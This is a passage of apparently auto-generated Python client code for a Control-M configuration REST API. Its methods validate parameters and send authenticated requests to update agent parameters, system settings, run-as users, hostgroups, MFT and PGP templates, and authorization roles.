OptionalValue body: The new parameter value. :return: KeyValue If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.set_agent_parameter_with_http_info(server, agent, name, **kwargs) # noqa: E501 else: (data) = self.set_agent_parameter_with_http_info(server, agent, name, **kwargs) # noqa: E501 return data def set_agent_parameter_with_http_info(self, server, agent, name, **kwargs): # noqa: E501 """set agent parameter # noqa: E501 Set the value of the specified parameter in the specified agent. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.set_agent_parameter_with_http_info(server, agent, name, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str agent: The name of the agent to update. (required) :param str name: The parameter name. (required) :param OptionalValue body: The new parameter value. :return: KeyValue If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'name', 'body'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method set_agent_parameter" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `set_agent_parameter`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `set_agent_parameter`") # noqa: E501 # verify the required parameter 'name' is set if self.api_client.client_side_validation and ('name' not in params or params['name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `name` when calling `set_agent_parameter`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'name' in params: path_params['name'] = params['name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'body' in params: body_params = params['body'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/param/{name}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='KeyValue', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def set_system_setting(self, systemsetting, **kwargs): # noqa: E501 """Set system setting for Control-M environment # noqa: E501 Set system setting for Control-M environment # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.set_system_setting(systemsetting, async_req=True) >>> result = thread.get() :param async_req bool :param file systemsetting: System Setting JSON file (required) :param file saml2metadatafile: SAML2 Identity Provider Metadata file to upload :param str server: Server to which the system settings are applied :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.set_system_setting_with_http_info(systemsetting, **kwargs) # noqa: E501 else: (data) = self.set_system_setting_with_http_info(systemsetting, **kwargs) # noqa: E501 return data def set_system_setting_with_http_info(self, systemsetting, **kwargs): # noqa: E501 """Set system setting for Control-M environment # noqa: E501 Set system setting for Control-M environment # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.set_system_setting_with_http_info(systemsetting, async_req=True) >>> result = thread.get() :param async_req bool :param file systemsetting: System Setting JSON file (required) :param file saml2metadatafile: SAML2 Identity Provider Metadata file to upload :param str server: Server to which the system settings are applied :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['systemsetting', 'saml2metadatafile', 'server'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method set_system_setting" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'systemsetting' is set if self.api_client.client_side_validation and ('systemsetting' not in params or params['systemsetting'] is None): # noqa: E501 raise ValueError("Missing the required parameter `systemsetting` when calling `set_system_setting`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] if 'server' in params: query_params.append(('server', params['server'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} if 'systemsetting' in params: local_var_files['systemsetting'] = params['systemsetting'] # noqa: E501 if 'saml2metadatafile' in params: local_var_files['saml2metadatafile'] = params['saml2metadatafile'] # noqa: E501 body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['multipart/form-data']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/systemsettings', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def set_user_preferences(self, user_name, user_preferences, **kwargs): # noqa: E501 """Set user preferences by user name # noqa: E501 Set user preferences by user name. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.set_user_preferences(user_name, user_preferences, async_req=True) >>> result = thread.get() :param async_req bool :param str user_name: The name of the user (required) :param UserPreferences user_preferences: The new value of UserPreferences to set (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.set_user_preferences_with_http_info(user_name, user_preferences, **kwargs) # noqa: E501 else: (data) = self.set_user_preferences_with_http_info(user_name, user_preferences, **kwargs) # noqa: E501 return data def set_user_preferences_with_http_info(self, user_name, user_preferences, **kwargs): # noqa: E501 """Set user preferences by user name # noqa: E501 Set user preferences by user name. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.set_user_preferences_with_http_info(user_name, user_preferences, async_req=True) >>> result = thread.get() :param async_req bool :param str user_name: The name of the user (required) :param UserPreferences user_preferences: The new value of UserPreferences to set (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['user_name', 'user_preferences'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method set_user_preferences" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'user_name' is set if self.api_client.client_side_validation and ('user_name' not in params or params['user_name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user_name` when calling `set_user_preferences`") # noqa: E501 # verify the required parameter 'user_preferences' is set if self.api_client.client_side_validation and ('user_preferences' not in params or params['user_preferences'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user_preferences` when calling `set_user_preferences`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] if 'user_name' in params: query_params.append(('userName', params['user_name'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None if 'user_preferences' in params: body_params = params['user_preferences'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/user/preferences', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def test_run_as_user(self, server, agent, user, **kwargs): # noqa: E501 """Test existed Run-as user # noqa: E501 Test existing Run-as user in server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.test_run_as_user(server, agent, user, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str agent: The Agent (required) :param str user: The user name (required) :param RunAsUserDetailsData run_as_user_details_data: Run as user details data :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.test_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501 else: (data) = self.test_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501 return data def test_run_as_user_with_http_info(self, server, agent, user, **kwargs): # noqa: E501 """Test existed Run-as user # noqa: E501 Test existing Run-as user in server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.test_run_as_user_with_http_info(server, agent, user, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str agent: The Agent (required) :param str user: The user name (required) :param RunAsUserDetailsData run_as_user_details_data: Run as user details data :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'user', 'run_as_user_details_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method test_run_as_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `test_run_as_user`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `test_run_as_user`") # noqa: E501 # verify the required parameter 'user' is set if self.api_client.client_side_validation and ('user' not in params or params['user'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user` when calling `test_run_as_user`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'user' in params: path_params['user'] = params['user'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'run_as_user_details_data' in params: body_params = params['run_as_user_details_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/runasuser/{agent}/{user}/test', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_fts_settings(self, server, agent, fts_settings_data, **kwargs): # noqa: E501 """Update File Transfer Server (FTS) configuration data. # noqa: E501 Update File Transfer Server (FTS) configuration data. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_fts_settings(server, agent, fts_settings_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param FtsSettingsData fts_settings_data: File Transfer Server (FTS) configuration data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_fts_settings_with_http_info(server, agent, fts_settings_data, **kwargs) # noqa: E501 else: (data) = self.update_fts_settings_with_http_info(server, agent, fts_settings_data, **kwargs) # noqa: E501 return data def update_fts_settings_with_http_info(self, server, agent, fts_settings_data, **kwargs): # noqa: E501 """Update File Transfer Server (FTS) configuration data. # noqa: E501 Update File Transfer Server (FTS) configuration data. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_fts_settings_with_http_info(server, agent, fts_settings_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param FtsSettingsData fts_settings_data: File Transfer Server (FTS) configuration data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'fts_settings_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_fts_settings" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `update_fts_settings`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `update_fts_settings`") # noqa: E501 # verify the required parameter 'fts_settings_data' is set if self.api_client.client_side_validation and ('fts_settings_data' not in params or params['fts_settings_data'] is None): # noqa: E501 raise ValueError("Missing the required parameter `fts_settings_data` when calling `update_fts_settings`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'fts_settings_data' in params: body_params = params['fts_settings_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json', 'text/plain']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/fts/settings', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_hosts_in_hostgroup(self, server, hostgroup, host_group_member_params_list, **kwargs): # noqa: E501 """update agents in hostgroup. # noqa: E501 update agents in hostgroup. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_hosts_in_hostgroup(server, hostgroup, host_group_member_params_list, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str hostgroup: The hostgroup name (required) :param HostgroupProperties host_group_member_params_list: Agent list to update in a hostgroup (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_hosts_in_hostgroup_with_http_info(server, hostgroup, host_group_member_params_list, **kwargs) # noqa: E501 else: (data) = self.update_hosts_in_hostgroup_with_http_info(server, hostgroup, host_group_member_params_list, **kwargs) # noqa: E501 return data def update_hosts_in_hostgroup_with_http_info(self, server, hostgroup, host_group_member_params_list, **kwargs): # noqa: E501 """update agents in hostgroup. # noqa: E501 update agents in hostgroup. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_hosts_in_hostgroup_with_http_info(server, hostgroup, host_group_member_params_list, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str hostgroup: The hostgroup name (required) :param HostgroupProperties host_group_member_params_list: Agent list to update in a hostgroup (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'hostgroup', 'host_group_member_params_list'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_hosts_in_hostgroup" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `update_hosts_in_hostgroup`") # noqa: E501 # verify the required parameter 'hostgroup' is set if self.api_client.client_side_validation and ('hostgroup' not in params or params['hostgroup'] is None): # noqa: E501 raise ValueError("Missing the required parameter `hostgroup` when calling `update_hosts_in_hostgroup`") # noqa: E501 # verify the required parameter 'host_group_member_params_list' is set if self.api_client.client_side_validation and ('host_group_member_params_list' not in params or params['host_group_member_params_list'] is None): # noqa: E501 raise ValueError("Missing the required parameter `host_group_member_params_list` when calling `update_hosts_in_hostgroup`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'hostgroup' in params: path_params['hostgroup'] = params['hostgroup'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'host_group_member_params_list' in params: body_params = params['host_group_member_params_list'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/hostgroup/{hostgroup}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_mft_configuration(self, server, agent, mft_configuration_data, **kwargs): # noqa: E501 """Update MFT Configuration # noqa: E501 Update MFT Configuration # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_mft_configuration(server, agent, mft_configuration_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param MftConfigurationData mft_configuration_data: MFT Configuration Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_mft_configuration_with_http_info(server, agent, mft_configuration_data, **kwargs) # noqa: E501 else: (data) = self.update_mft_configuration_with_http_info(server, agent, mft_configuration_data, **kwargs) # noqa: E501 return data def update_mft_configuration_with_http_info(self, server, agent, mft_configuration_data, **kwargs): # noqa: E501 """Update MFT Configuration # noqa: E501 Update MFT Configuration # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_mft_configuration_with_http_info(server, agent, mft_configuration_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param MftConfigurationData mft_configuration_data: MFT Configuration Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'mft_configuration_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_mft_configuration" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `update_mft_configuration`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `update_mft_configuration`") # noqa: E501 # verify the required parameter 'mft_configuration_data' is set if self.api_client.client_side_validation and ('mft_configuration_data' not in params or params['mft_configuration_data'] is None): # noqa: E501 raise ValueError("Missing the required parameter `mft_configuration_data` when calling `update_mft_configuration`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'mft_configuration_data' in params: body_params = params['mft_configuration_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/configuration', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_pgp_template(self, server, agent, template_name, pgp_template_data, **kwargs): # noqa: E501 """Update PGP Template # noqa: E501 Update PGP Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_pgp_template(server, agent, template_name, pgp_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The PGP Template Name (required) :param PgpTemplateData pgp_template_data: PGP Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_pgp_template_with_http_info(server, agent, template_name, pgp_template_data, **kwargs) # noqa: E501 else: (data) = self.update_pgp_template_with_http_info(server, agent, template_name, pgp_template_data, **kwargs) # noqa: E501 return data def update_pgp_template_with_http_info(self, server, agent, template_name, pgp_template_data, **kwargs): # noqa: E501 """Update PGP Template # noqa: E501 Update PGP Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_pgp_template_with_http_info(server, agent, template_name, pgp_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The PGP Template Name (required) :param PgpTemplateData pgp_template_data: PGP Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'template_name', 'pgp_template_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_pgp_template" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `update_pgp_template`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `update_pgp_template`") # noqa: E501 # verify the required parameter 'template_name' is set if self.api_client.client_side_validation and ('template_name' not in params or params['template_name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `template_name` when calling `update_pgp_template`") # noqa: E501 # verify the required parameter 'pgp_template_data' is set if self.api_client.client_side_validation and ('pgp_template_data' not in params or params['pgp_template_data'] is None): # noqa: E501 raise ValueError("Missing the required parameter `pgp_template_data` when calling `update_pgp_template`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'template_name' in params: path_params['templateName'] = params['template_name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'pgp_template_data' in params: body_params = params['pgp_template_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/pgptemplate/{templateName}', 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_role(self, role, role_file, **kwargs): # noqa: E501 """Update Authorization Role # noqa: E501 Update Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_role(role, role_file, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :param file role_file: File with contenet of Role Data. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_role_with_http_info(role, role_file, **kwargs) # noqa: E501 else: (data) = self.update_role_with_http_info(role, role_file, **kwargs) # noqa: E501 return data def update_role_with_http_info(self, role, role_file, **kwargs): # noqa: E501 """Update Authorization Role # noqa: E501 Update Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_role_with_http_info(role, role_file, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :param file role_file: File with contenet of Role Data. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['role', 'role_file'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_role" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'role' is set if self.api_client.client_side_validation and ('role' not in params or params['role'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role` when calling `update_role`") # noqa: E501 # verify the required parameter 'role_file' is set if self.api_client.client_side_validation and ('role_file' not in params or params['role_file'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role_file` when calling `update_role`") # noqa: E501 collection_formats = {} path_params = {} if 'role' in params: path_params['role'] = params['role'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} if 'role_file' in params: local_var_files['roleFile'] = params['role_file'] # noqa: E501 body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['multipart/form-data']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/role/{role}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_run_as_user(self, server, agent, user, run_as_user_details_data, **kwargs): # noqa: E501 """Update Run-as user # noqa: E501 Update Run-as user details in server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_run_as_user(server, agent, user, run_as_user_details_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str agent: The Agent (required) :param str user: The user name (required) :param RunAsUserDetailsData run_as_user_details_data: Run as user details data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_run_as_user_with_http_info(server, agent, user, run_as_user_details_data, **kwargs) # noqa: E501 else: (data) = self.update_run_as_user_with_http_info(server, agent, user, run_as_user_details_data, **kwargs) # noqa: E501 return data def update_run_as_user_with_http_info(self, server, agent, user, run_as_user_details_data, **kwargs): # noqa: E501 """Update Run-as user # noqa: E501 Update Run-as user details in server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_run_as_user_with_http_info(server, agent, user, run_as_user_details_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str agent: The Agent (required) :param str user: The user name (required) :param RunAsUserDetailsData run_as_user_details_data: Run as user details data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'user', 'run_as_user_details_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_run_as_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `update_run_as_user`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `update_run_as_user`") # noqa: E501 # verify the required parameter 'user' is set if self.api_client.client_side_validation and ('user' not in params or params['user'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user` when calling `update_run_as_user`") # noqa: E501 # verify the required parameter 'run_as_user_details_data' is set if self.api_client.client_side_validation and ('run_as_user_details_data' not in params or params['run_as_user_details_data'] is None): # noqa: E501 raise ValueError("Missing the required parameter `run_as_user_details_data` when calling `update_run_as_user`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'user' in params: path_params['user'] = params['user'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'run_as_user_details_data' in params: body_params = params['run_as_user_details_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/runasuser/{agent}/{user}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), 